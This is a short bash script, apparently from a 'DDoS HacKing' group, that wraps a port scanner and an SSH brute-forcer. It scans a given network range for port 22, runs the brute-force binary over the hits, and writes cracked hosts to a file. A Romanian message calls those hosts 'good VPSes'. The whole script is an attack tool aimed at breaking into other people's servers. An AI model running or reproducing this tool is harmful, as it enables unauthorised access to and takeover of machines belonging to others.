#!/bin/bash



if [ $# != 1 ]; then
        echo " usage: $0 <b class>"
        exit;
fi
rm -rf scan.log
BLK='[1;30m'
RED='[1;31m'
GRN='[1;32m'
YEL='[1;33m'
BLU='[1;34m'
MAG='[1;35m'
CYN='[1;36m'
WHI='[1;37m'
DRED='[0;31m' // o
DGRN='[0;32m'
DYEL='[0;33m'
DBLU='[0;34m'
DMAG='[0;35m'
DCYN='[0;36m'
DWHI='[0;37m'
RES='[0m'
echo "[1;34m##################################################[1;34m"
echo "[1;34m#                   Scanner Mix                   #[1;34m"
echo "[1;33m#                    2018-2019                    #[1;33m"
echo "[1;33m##################################################[1;33m"
echo "[1;31m#          Scanner privat by DDoS HacKing         #[1;31m"
echo "[1;31m##################################################[1;31m"
echo "[0;34m [0;34m"

././pscan2 $1 22
echo "[0;36m [0;36m"

./sshd scan.log 1 2 3 3000 port 22
sort port | uniq -uc > good
echo "~~~~~~~~~~~~~~[BruteForce SSH Scanner]~~~~~~~~~~~~~~~~"
echo "Comanda : cat good | Pentru a vedea vps-urile bune."
echo "~~~~~~~~~~~~~~[BruteForce SSH Scanner]~~~~~~~~~~~~~~~~"